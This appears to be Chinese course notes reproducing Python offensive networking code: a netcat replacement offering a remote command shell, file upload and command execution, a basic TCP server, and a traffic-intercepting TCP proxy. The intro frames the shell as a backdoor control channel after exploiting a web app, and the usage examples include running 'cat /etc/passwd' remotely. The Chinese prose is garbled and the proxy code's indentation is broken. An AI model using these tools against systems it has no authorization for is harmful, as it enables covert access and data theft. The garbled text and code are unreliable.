第三周代码

Python网络编程

取代 netcat

netcat是是网络界的“瑞士军刀",所以聪明的系统管理员都会将它从系统中移除。不止在一个场合,我进众的服务器没有安装 netcat却安装了 Python。在这种情况下,需要创建一个简单的客户端和服务器用来传递想使用的文件,或者创建个监听端让自已拥有增时命令的增们如果作是通过Web应用漏洞进入服务器的,那么在后台调用Python创建备用的控制通道显得尤为重要

这样就不需要首先在目标器上安装木马或后门

bhnet.py

 

import sys

import socket

import getopt

import threading

import subprocess

 

 

# define some global variables

listen             = False

command            = False

upload             = False

execute            = ""

target             = ""

upload_destination = ""

port               = 0

 

# this runs a command and returns the output

def run_command(command):

        

        # trim the newline

        command = command.rstrip()

        

        # run the command and get the output back

        try:

                output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)

        except:

                output = "Failed to execute command.\r\n"

        

        # send the output back to the client

        return output

 

# this handles incoming client connections

def client_handler(client_socket):

        global upload

        global execute

        global command

        

        # check for upload

        if len(upload_destination):

                

                # read in all of the bytes and write to our destination

                file_buffer = ""

                

                # keep reading data until none is available

                while True:

                        data = client_socket.recv(1024)

                        

                        if not data:

                                break

                        else:

                                file_buffer += data

                                

                # now we take these bytes and try to write them out

                try:

                        file_descriptor = open(upload_destination,"wb")

                        file_descriptor.write(file_buffer)

                        file_descriptor.close()

                        

                        # acknowledge that we wrote the file out

                        client_socket.send("Successfully saved file to %s\r\n" % upload_destination)

                except:

                        client_socket.send("Failed to save file to %s\r\n" % upload_destination)

                        

                

        

        # check for command execution

        if len(execute):

                

                # run the command

                output = run_command(execute)

                

                client_socket.send(output)

        

        

        # now we go into another loop if a command shell was requested

        if command:

                

                while True:

                        # show a simple prompt

                        client_socket.send("<BHP:#> ")

                        

                        # now we receive until we see a linefeed (enter key)

                        cmd_buffer = ""

                        while "\n" not in cmd_buffer:

                                cmd_buffer += client_socket.recv(1024)

                

                        

                        # we have a valid command so execute it and send back the results

                        response = run_command(cmd_buffer)

                        

                        # send back the response

                        client_socket.send(response)

        

# this is for incoming connections

def server_loop():

        global target

        global port

        

        # if no target is defined we listen on all interfaces

        if not len(target):

                target = "0.0.0.0"

                

        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        server.bind((target,port))

        

        server.listen(5)        

        

        while True:

                client_socket, addr = server.accept()

                

                # spin off a thread to handle our new client

                client_thread = threading.Thread(target=client_handler,args=(client_socket,))

                client_thread.start()

                

 

# if we don't listen we are a client....make it so.

def client_sender(buffer):

        

        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

                

        try:

                # connect to our target host

                client.connect((target,port))

                

                # if we detect input from stdin send it

                # if not we are going to wait for the user to punch some in

                

                if len(buffer):

                        

                        client.send(buffer)

                

                while True:

                        

                        # now wait for data back

                        recv_len = 1

                        response = ""

                        

                        while recv_len:

                                data     = client.recv(4096)

                                recv_len = len(data)

                                response+= data

                                

                                if recv_len < 4096:

                                        break

                        

                        print response,

                        

                        # wait for more input

                        buffer = raw_input("")

                        buffer += "\n"                        

                        

                        # send it off

                        client.send(buffer)

                        

                

        except:

                # just catch generic errors - you can do your homework to beef this up

                print "[*] Exception! Exiting."

                

                # teardown the connection                  

                client.close()  

                        

                        

        

 

def usage():

        print "Netcat Replacement"

        print

        print "Usage: bhpnet.py -t target_host -p port"

        print "-l --listen                - listen on [host]:[port] for incoming connections"

        print "-e --execute=file_to_run   - execute the given file upon receiving a connection"

        print "-c --command               - initialize a command shell"

        print "-u --upload=destination    - upon receiving connection upload a file and write to [destination]"

        print

        print

        print "Examples: "

        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"

        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"

        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""

        print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"

        sys.exit(0)

 

 

def main():

        global listen

        global port

        global execute

        global command

        global upload_destination

        global target

        

        if not len(sys.argv[1:]):

                usage()

                

        # read the commandline options

        try:

                opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])

        except getopt.GetoptError as err:

                print str(err)

                usage()

                

                

        for o,a in opts:

                if o in ("-h","--help"):

                        usage()

                elif o in ("-l","--listen"):

                        listen = True

                elif o in ("-e", "--execute"):

                        execute = a

                elif o in ("-c", "--commandshell"):

                        command = True

                elif o in ("-u", "--upload"):

                        upload_destination = a

                elif o in ("-t", "--target"):

                        target = a

                elif o in ("-p", "--port"):

                        port = int(a)

                else:

                        assert False,"Unhandled Option"

        

 

        # are we going to listen or just send data from stdin

        if not listen and len(target) and port > 0:

                

                # read in the buffer from the commandline

                # this will block, so send CTRL-D if not sending input

                # to stdin

                buffer = sys.stdin.read()

                

                # send data off

                client_sender(buffer)   

        

        # we are going to listen and potentially

        # upload things, execute commands and drop a shell back

        # depending on our command line options above

        if listen:

                server_loop()

 

main()

 

 

listing-1-3.py

import socket

import threading

 

bind_ip   = "0.0.0.0"

bind_port = 9999

 

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 

server.bind((bind_ip,bind_port))

 

server.listen(5)

 

print "[*] Listening on %s:%d" % (bind_ip,bind_port)

 

# this is our client handling thread

def handle_client(client_socket):

 

    # just print out what the client sends

    request = client_socket.recv(1024)

    

    print "[*] Received: %s" % request    

 

    # send back a packet

    client_socket.send("ACK!")

    print client_socket.getpeername()

    client_socket.close()

 

 

while True:

 

    client,addr = server.accept()

    

    print "[*] Accepted connection from: %s:%d" % (addr[0],addr[1])

 

    # spin up our client thread to handle incoming data

    client_handler = threading.Thread(target=handle_client,args=(client,))

client_handler.start()

我们将接收的数据提交给 response Handler函数。在函数中,我们可以修改数据包的内容,进行模测试任务,检测认证内题,或者其他任何你想做的事情,这里还有个类假的 request_handler函数可以将输出的流量进行整改最后步是将接收的缓有发送到不地客户据

剩于下的代码非简单我们持本地取数据处理,发送到运程主机、从

程读取取数据据、处理,发送国本地机自到有数据都处理

面我们将剩余的函数代码添加进来,完成代理本的编写:

 

import sys

import socket

import threading

 

 

 

# this is a pretty hex dumping function directly taken from

# http://code.activestate.com/recipes/142812-hex-dumper/

def hexdump(src, length=16):

    result = []

    digits = 4 if isinstance(src, unicode) else 2

 

    for i in xrange(0, len(src), length):

       s = src[i:i+length]

       hexa = b' '.join(["%0*X" % (digits, ord(x))  for x in s])

       text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.'  for x in s])

       result.append( b"%04X   %-*s   %s" % (i, length*(digits + 1), hexa, text) )

 

    print b'\n'.join(result)

 

 

def receive_from(connection):

        

        buffer = ""

 

# We set a 2 second time out depending on your

# target this may need to be adjusted

connection.settimeout(2)

 

        try:

                # keep reading into the buffer until there's no more data

# or we time out

                while True:

                        data = connection.recv(4096)

                        

                        if not data:

                                break

                        

                        buffer += data

                

                

        except:

pass

        

        return buffer

 

# modify any requests destined for the remote host

def request_handler(buffer):

# perform packet modifications

return buffer

 

# modify any responses destined for the local host

def response_handler(buffer):

# perform packet modifications

return buffer

 

 

def proxy_handler(client_socket, remote_host, remote_port, receive_first):

        

        # connect to the remote host

        remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        remote_socket.connect((remote_host,remote_port))

 

        # receive data from the remote end if necessary

        if receive_first:

                

                remote_buffer = receive_from(remote_socket)

                hexdump(remote_buffer)

 

                # send it to our response handler

remote_buffer = response_handler(remote_buffer)

                

                # if we have data to send to our local client send it

                if len(remote_buffer):

                        print "[<==] Sending %d bytes to localhost." % len(remote_buffer)

                        client_socket.send(remote_buffer)

                        

# now let's loop and reading from local, send to remote, send to local

# rinse wash repeat

while True:

 

# read from local host

local_buffer = receive_from(client_socket)

 

 

if len(local_buffer):

 

print "[==>] Received %d bytes from localhost." % len(local_buffer)

hexdump(local_buffer)

 

# send it to our request handler

local_buffer = request_handler(local_buffer)

 

# send off the data to the remote host

remote_socket.send(local_buffer)

print "[==>] Sent to remote."

 

 

# receive back the response

remote_buffer = receive_from(remote_socket)

 

if len(remote_buffer):

 

print "[<==] Received %d bytes from remote." % len(remote_buffer)

hexdump(remote_buffer)

 

# send to our response handler

remote_buffer = response_handler(remote_buffer)

 

# send the response to the local socket

client_socket.send(remote_buffer)

 

print "[<==] Sent to localhost."

 

# if no more data on either side close the connections

if not len(local_buffer) or not len(remote_buffer):

client_socket.close()

remote_socket.close()

print "[*] No more data. Closing connections."

 

break

 

def server_loop(local_host,local_port,remote_host,remote_port,receive_first):

                

        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 

        try:

                server.bind((local_host,local_port))

        except:

                print "[!!] Failed to listen on %s:%d" % (local_host,local_port)

                print "[!!] Check for other listening sockets or correct permissions."

                sys.exit(0)

                

        print "[*] Listening on %s:%d" % (local_host,local_port)

        

        

        server.listen(5)        

        

        while True:

                client_socket, addr = server.accept()

               

                # print out the local connection information

                print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])

                

                # start a thread to talk to the remote host

                proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,remote_host,remote_port,receive_first))

                proxy_thread.start()

 

def main():

        

    # no fancy command line parsing here

    if len(sys.argv[1:]) != 5:

        print "Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]"

        print "Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True"

        sys.exit(0)

    

    # setup local listening parameters

    local_host  = sys.argv[1]

    local_port  = int(sys.argv[2])

    

    # setup remote target

    remote_host = sys.argv[3]

    remote_port = int(sys.argv[4])

    

    # this tells our proxy to connect and receive data

    # before sending to the remote host

    receive_first = sys.argv[5]

    

    if "True" in receive_first:

    receive_first = True

    else:

    receive_first = False

    

    

    # now spin up our listening socket

    server_loop(local_host,local_port,remote_host,remote_port,receive_first)

        

main()